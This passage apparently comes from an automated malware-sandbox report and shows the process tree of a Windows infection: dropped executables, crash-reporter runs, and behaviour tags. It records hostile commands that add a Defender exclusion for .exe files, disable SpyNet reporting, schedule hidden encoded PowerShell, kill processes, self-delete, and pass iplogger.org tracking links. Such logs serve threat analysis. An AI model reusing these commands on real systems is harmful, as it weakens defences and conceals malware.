PID:5932

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 632
6⤵
PID:5448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 724
6⤵
PID:1280

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 732
6⤵
PID:5248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5344 -s 1244
6⤵
PID:6124

C:\Users\Admin\Pictures\Adobe Films\80Jwgcn3LfWZRf5K8hZtLYTe.exe
"C:\Users\Admin\Pictures\Adobe Films\80Jwgcn3LfWZRf5K8hZtLYTe.exe"
5⤵
PID:5336

C:\Users\Admin\Pictures\Adobe Films\gXDKuoAgfH0cVjGe7NFIA0mz.exe
"C:\Users\Admin\Pictures\Adobe Films\gXDKuoAgfH0cVjGe7NFIA0mz.exe"
5⤵
PID:5412

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" .\a6U_WGm.9B
6⤵
PID:6120

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL .\a6U_WGm.9B
7⤵
PID:3132

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL .\a6U_WGm.9B
8⤵
PID:208

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 .\a6U_WGm.9B
9⤵
PID:824

C:\Users\Admin\Pictures\Adobe Films\RYiWnExn5UzjZBjYg6spGVLC.exe
"C:\Users\Admin\Pictures\Adobe Films\RYiWnExn5UzjZBjYg6spGVLC.exe"
5⤵
PID:5428

C:\Users\Admin\AppData\Local\Temp\7zSE315.tmp\Install.exe
.\Install.exe
6⤵
PID:5888

C:\Users\Admin\AppData\Local\Temp\7zSEB9.tmp\Install.exe
.\Install.exe /S /site_id "525403"
7⤵
PID:4848

C:\Users\Admin\Pictures\Adobe Films\dV6IzfymhrGjyZ_jfoxMgXC1.exe
"C:\Users\Admin\Pictures\Adobe Films\dV6IzfymhrGjyZ_jfoxMgXC1.exe"
5⤵
PID:5988

C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe
"C:\Users\Admin\AppData\Local\Temp\TrdngAnlzr2249.exe"
6⤵
PID:4796

C:\Users\Admin\AppData\Local\Temp\MC0AL.exe
"C:\Users\Admin\AppData\Local\Temp\MC0AL.exe"
7⤵
PID:3216

C:\Users\Admin\AppData\Local\Temp\LFF9B.exe
"C:\Users\Admin\AppData\Local\Temp\LFF9B.exe"
7⤵
PID:4968

C:\Users\Admin\AppData\Local\Temp\LFF9B.exe
"C:\Users\Admin\AppData\Local\Temp\LFF9B.exe"
7⤵
PID:3536

C:\Users\Admin\AppData\Local\Temp\4IE8G.exe
"C:\Users\Admin\AppData\Local\Temp\4IE8G.exe"
7⤵
PID:5388

C:\Users\Admin\AppData\Local\Temp\2L776.exe
"C:\Users\Admin\AppData\Local\Temp\2L776.exe"
7⤵
PID:5912

C:\Users\Admin\AppData\Local\Temp\74542.exe
"C:\Users\Admin\AppData\Local\Temp\74542.exe"
7⤵
PID:2080

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",
8⤵
PID:844

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",
9⤵
PID:5336

C:\Windows\system32\RunDll32.exe
C:\Windows\system32\RunDll32.exe Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",
10⤵
PID:3964

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\SysWOW64\rundll32.exe" "C:\Windows\SysWOW64\shell32.dll",#44 "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",
11⤵
PID:5068

C:\Users\Admin\AppData\Local\Temp\74542BKD0E4EF9G.exe
https://iplogger.org/1OAvJ
7⤵
PID:3588

C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe
"C:\Users\Admin\AppData\Local\Temp\InsigniaCleanerInstall238497.exe"
6⤵
PID:5196

C:\Users\Admin\AppData\Local\Temp\4e2aeb0f-5eae-44bb-9344-121f30746144.exe
"C:\Users\Admin\AppData\Local\Temp\4e2aeb0f-5eae-44bb-9344-121f30746144.exe"
7⤵
PID:5652

C:\Users\Admin\AppData\Local\Temp\po50.exe
"C:\Users\Admin\AppData\Local\Temp\po50.exe"
6⤵
PID:5564

C:\Users\Admin\AppData\Local\Temp\fchen.exe
"C:\Users\Admin\AppData\Local\Temp\fchen.exe"
6⤵
PID:2552

C:\Users\Admin\AppData\Local\Temp\fchen.exe
"C:\Users\Admin\AppData\Local\Temp\fchen.exe" -h
7⤵
PID:5864

C:\Users\Admin\AppData\Local\Temp\tvstream17.exe
"C:\Users\Admin\AppData\Local\Temp\tvstream17.exe"
6⤵
PID:5148

C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
7⤵
PID:4436

C:\Users\Admin\AppData\Local\Temp\bcleaner.exe
"C:\Users\Admin\AppData\Local\Temp\bcleaner.exe"
6⤵
PID:3500

C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe
"C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe"
7⤵
PID:5984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 652
8⤵
PID:4564

C:\Users\Admin\AppData\Local\Temp\jg1_1faf.exe
"C:\Users\Admin\AppData\Local\Temp\jg1_1faf.exe"
6⤵
PID:984

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe"
6⤵
PID:4124

C:\Users\Admin\AppData\Local\Temp\is-UR5B9.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-UR5B9.tmp\setup.tmp" /SL5="$60276,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe"
7⤵
PID:5364

C:\Users\Admin\AppData\Local\Temp\setup.exe
"C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
8⤵
PID:992

C:\Users\Admin\AppData\Local\Temp\is-JH750.tmp\setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JH750.tmp\setup.tmp" /SL5="$102DE,870458,780800,C:\Users\Admin\AppData\Local\Temp\setup.exe" /SILENT
9⤵
PID:2976

C:\Users\Admin\AppData\Local\Temp\siww1049.exe
"C:\Users\Admin\AppData\Local\Temp\siww1049.exe"
6⤵
PID:4600

C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /stab C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
7⤵
PID:4236

C:\Users\Admin\AppData\Local\Temp\inst200.exe
"C:\Users\Admin\AppData\Local\Temp\inst200.exe"
6⤵
PID:4892

C:\Users\Admin\AppData\Local\Temp\udontsay.exe
"C:\Users\Admin\AppData\Local\Temp\udontsay.exe"
6⤵
PID:5968

C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
"C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe"
6⤵
PID:1624

C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe
"C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe"
6⤵
PID:5800

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",
7⤵
PID:1656

C:\Users\Admin\AppData\Local\Temp\anytime1.exe
"C:\Users\Admin\AppData\Local\Temp\anytime1.exe"
6⤵
PID:5688

C:\Users\Admin\AppData\Local\Temp\anytime2.exe
"C:\Users\Admin\AppData\Local\Temp\anytime2.exe"
6⤵
PID:748

C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe
"C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe"
6⤵
PID:1236

C:\Users\Admin\Pictures\Adobe Films\6KKo6k1apCeYUITcuYGhtDbH.exe
"C:\Users\Admin\Pictures\Adobe Films\6KKo6k1apCeYUITcuYGhtDbH.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4720

C:\Users\Admin\Pictures\Adobe Films\XuWcMgieroS1v7hySTYG0dJv.exe
"C:\Users\Admin\Pictures\Adobe Films\XuWcMgieroS1v7hySTYG0dJv.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
- Suspicious use of SetWindowsHookEx
PID:3324

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Affaticato.gif
4⤵
PID:1572

C:\Windows\SysWOW64\cmd.exe
cmd
5⤵
PID:880

C:\Users\Admin\Pictures\Adobe Films\sjMARMVRFbL9N8ESXNFFQ1Xy.exe
"C:\Users\Admin\Pictures\Adobe Films\sjMARMVRFbL9N8ESXNFFQ1Xy.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:1200

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1200 -s 372
4⤵
- Program crash
PID:3220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1200 -s 468
4⤵
PID:1804

C:\Users\Admin\Pictures\Adobe Films\CVz9dul4nsYUrZoXcsOyvEGs.exe
"C:\Users\Admin\Pictures\Adobe Films\CVz9dul4nsYUrZoXcsOyvEGs.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:4016

C:\Users\Admin\Pictures\Adobe Films\3iC1GjHNUtVXWTPWlzAilUS8.exe
"C:\Users\Admin\Pictures\Adobe Films\3iC1GjHNUtVXWTPWlzAilUS8.exe"
3⤵
PID:2332

C:\Users\Admin\Pictures\Adobe Films\gnoBNEnajN3DF_lenme5vMp7.exe
"C:\Users\Admin\Pictures\Adobe Films\gnoBNEnajN3DF_lenme5vMp7.exe"
3⤵
- Executes dropped EXE
PID:2256

C:\Users\Admin\Pictures\Adobe Films\KPKFfLHFt4bmysKtiI9Ir8Za.exe
"C:\Users\Admin\Pictures\Adobe Films\KPKFfLHFt4bmysKtiI9Ir8Za.exe"
3⤵
- Executes dropped EXE
PID:2116

C:\Users\Admin\AppData\Local\Temp\G219H.exe
"C:\Users\Admin\AppData\Local\Temp\G219H.exe"
4⤵
PID:2384

C:\Users\Admin\AppData\Local\Temp\3GH57.exe
"C:\Users\Admin\AppData\Local\Temp\3GH57.exe"
4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1368

C:\Users\Admin\AppData\Local\Temp\3GH57.exe
"C:\Users\Admin\AppData\Local\Temp\3GH57.exe"
4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:1156

C:\Users\Admin\AppData\Local\Temp\K7H1J.exe
"C:\Users\Admin\AppData\Local\Temp\K7H1J.exe"
4⤵
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:3664

C:\Users\Admin\AppData\Local\Temp\7LHK9.exe
"C:\Users\Admin\AppData\Local\Temp\7LHK9.exe"
4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:2332

C:\Users\Admin\AppData\Local\Temp\HJAGL.exe
"C:\Users\Admin\AppData\Local\Temp\HJAGL.exe"
4⤵
- Suspicious use of SetWindowsHookEx
PID:3168

C:\Windows\SysWOW64\control.exe
"C:\Windows\System32\control.exe" "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",
5⤵
PID:5400

C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\system32\rundll32.exe" Shell32.dll,Control_RunDLL "C:\Users\Admin\AppData\Local\Temp\QYNVYce.CpL",
6⤵
PID:5580

C:\Users\Admin\AppData\Local\Temp\L1210LHJ08H6320.exe
https://iplogger.org/1nChi7
4⤵
- Modifies Internet Explorer settings
- Suspicious use of SetWindowsHookEx
PID:3684

C:\Users\Admin\Pictures\Adobe Films\WuyA_a5dZV6KLnvBMY4hbZ3f.exe
"C:\Users\Admin\Pictures\Adobe Films\WuyA_a5dZV6KLnvBMY4hbZ3f.exe"
3⤵
- Executes dropped EXE
PID:3872

C:\Users\Admin\AppData\Local\Temp\Wsctpfnlhslasrsaigeprim.exe
"C:\Users\Admin\AppData\Local\Temp\Wsctpfnlhslasrsaigeprim.exe"
4⤵
PID:2324

C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
4⤵
PID:2500

C:\Users\Admin\Pictures\Adobe Films\0UDROfhv4cthEFENxAfzwY1O.exe
"C:\Users\Admin\Pictures\Adobe Films\0UDROfhv4cthEFENxAfzwY1O.exe"
3⤵
- Executes dropped EXE
- Checks computer location settings
PID:4964

C:\Users\Admin\AppData\Local\Temp\7212ad2b-2c4d-4bf3-b1e4-8f568e99f0ba.exe
"C:\Users\Admin\AppData\Local\Temp\7212ad2b-2c4d-4bf3-b1e4-8f568e99f0ba.exe"
4⤵
- Executes dropped EXE
PID:4496

C:\Users\Admin\Pictures\Adobe Films\kdA0UVbyNMNrbzDXkhEnvG3Z.exe
"C:\Users\Admin\Pictures\Adobe Films\kdA0UVbyNMNrbzDXkhEnvG3Z.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2500

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2500 -s 468
4⤵
PID:1752

C:\Users\Admin\Pictures\Adobe Films\TlyUP3dq6PRVTzWqSiImv67D.exe
"C:\Users\Admin\Pictures\Adobe Films\TlyUP3dq6PRVTzWqSiImv67D.exe"
3⤵
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetWindowsHookEx
PID:224

C:\Users\Admin\Pictures\Adobe Films\fR2Py6GrUGDwNvtUScPNhmO6.exe
"C:\Users\Admin\Pictures\Adobe Films\fR2Py6GrUGDwNvtUScPNhmO6.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2952

C:\Users\Admin\Pictures\Adobe Films\9Vajk0SkFVbrJDvaEGy11uUd.exe
"C:\Users\Admin\Pictures\Adobe Films\9Vajk0SkFVbrJDvaEGy11uUd.exe"
3⤵
- Executes dropped EXE
PID:2748

C:\Users\Admin\Pictures\Adobe Films\5h_bUCBNSSQjrM2aRDjk7gWC.exe
"C:\Users\Admin\Pictures\Adobe Films\5h_bUCBNSSQjrM2aRDjk7gWC.exe"
3⤵
- Executes dropped EXE
PID:4428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 620
4⤵
PID:4532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 648
4⤵
PID:3904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 656
4⤵
PID:5488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 916
4⤵
PID:3820

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 1256
4⤵
PID:4236

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 1264
4⤵
PID:6128

C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c taskkill /im "5h_bUCBNSSQjrM2aRDjk7gWC.exe" /f & erase "C:\Users\Admin\Pictures\Adobe Films\5h_bUCBNSSQjrM2aRDjk7gWC.exe" & exit
4⤵
PID:3900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4428 -s 1316
4⤵
PID:5312

C:\Users\Admin\Pictures\Adobe Films\DAXo_8j45JwReXyLq9COCJZ_.exe
"C:\Users\Admin\Pictures\Adobe Films\DAXo_8j45JwReXyLq9COCJZ_.exe"
3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4464 -ip 4464
1⤵
PID:4720

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4464 -ip 4464
1⤵
PID:4760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 180 -p 4464 -ip 4464
1⤵
PID:3432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4464 -ip 4464
1⤵
PID:4856

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4464 -ip 4464
1⤵
PID:4984

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4464 -ip 4464
1⤵
PID:3572

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 4464 -ip 4464
1⤵
PID:3008

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4464 -ip 4464
1⤵
PID:3900

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 4464 -ip 4464
1⤵
PID:2852

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4464 -ip 4464
1⤵
PID:960

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 180 -p 4464 -ip 4464
1⤵
PID:4276

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 524 -p 4464 -ip 4464
1⤵
PID:3392

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4464 -ip 4464
1⤵
PID:2284

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4464 -ip 4464
1⤵
PID:4220

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4464 -ip 4464
1⤵
PID:1248

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 4464 -ip 4464
1⤵
PID:4836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4464 -ip 4464
1⤵
PID:4152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4464 -ip 4464
1⤵
PID:4968

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4464 -ip 4464
1⤵
PID:4800

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 180 -p 4464 -ip 4464
1⤵
PID:3576

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4464 -ip 4464
1⤵
PID:2348

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s seclogon
1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1888

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1824 -ip 1824
1⤵
PID:3860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1824 -ip 1824
1⤵
PID:4016

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1824 -ip 1824
1⤵
PID:3592

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1824 -ip 1824
1⤵
PID:684

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1824 -ip 1824
1⤵
PID:2420

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1824 -ip 1824
1⤵
PID:1320

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1824 -ip 1824
1⤵
PID:4760

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1824 -ip 1824
1⤵
PID:2616

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 180 -p 1824 -ip 1824
1⤵
PID:3432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 1824 -ip 1824
1⤵
PID:4152

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 508 -p 1824 -ip 1824
1⤵
PID:372

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1824 -ip 1824
1⤵
PID:448

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 516 -p 1824 -ip 1824
1⤵
PID:3364

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 1824 -ip 1824
1⤵
PID:1704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 1824 -ip 1824
1⤵
PID:4548

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 512 -p 1824 -ip 1824
1⤵
PID:3632

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3356 -ip 3356
1⤵
PID:3440

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 180 -p 3356 -ip 3356
1⤵
PID:4836

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3356 -ip 3356
1⤵
PID:2596

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 3356 -ip 3356
1⤵
PID:1532

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 180 -p 3356 -ip 3356
1⤵
PID:3928

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3356 -ip 3356
1⤵
PID:3340

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3356 -ip 3356
1⤵
PID:3516

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3356 -ip 3356
1⤵
PID:668

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 556 -p 3356 -ip 3356
1⤵
PID:3428

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 3356 -ip 3356
1⤵
PID:2316

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 584 -p 3356 -ip 3356
1⤵
PID:3012

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 3356 -ip 3356
1⤵
PID:4488

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3356 -ip 3356
1⤵
PID:2432

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3356 -ip 3356
1⤵
PID:3708

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 608 -p 3356 -ip 3356
1⤵
PID:5080

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 576 -p 3356 -ip 3356
1⤵
PID:2916

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3356 -ip 3356
1⤵
PID:3324

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 3356 -ip 3356
1⤵
PID:3704

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3356 -ip 3356
1⤵
PID:1192

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3356 -ip 3356
1⤵
PID:384

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3356 -ip 3356
1⤵
- Suspicious use of WriteProcessMemory
PID:1904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 592 -p 3356 -ip 3356
1⤵
PID:4904

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 504 -p 3356 -ip 3356
1⤵
PID:4780

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 3356 -ip 3356
1⤵
PID:1240

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 3356 -ip 3356
1⤵
PID:3860

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1200 -ip 1200
1⤵
PID:1444

C:\Users\Admin\AppData\Local\Temp\7zS3793.tmp\Install.exe
.\Install.exe
1⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:544

C:\Users\Admin\AppData\Local\Temp\7zS52DB.tmp\Install.exe
.\Install.exe /S /site_id "525403"
2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Enumerates system info in registry
- Suspicious use of SetWindowsHookEx
PID:2616

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"
3⤵
PID:5508

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&
4⤵
PID:6044

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32
5⤵
PID:2364

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64
5⤵
PID:644

C:\Windows\SysWOW64\forfiles.exe
"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"
3⤵
PID:5684

C:\Windows\SysWOW64\cmd.exe
/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&
4⤵
PID:6020

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32
5⤵
PID:6080

\??\c:\windows\SysWOW64\reg.exe
REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64
5⤵
PID:3216

C:\Windows\SysWOW64\schtasks.exe
schtasks /CREATE /TN "gZZOCcdMn" /SC once /ST 04:57:22 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="
3⤵
- Creates scheduled task(s)
PID:5848

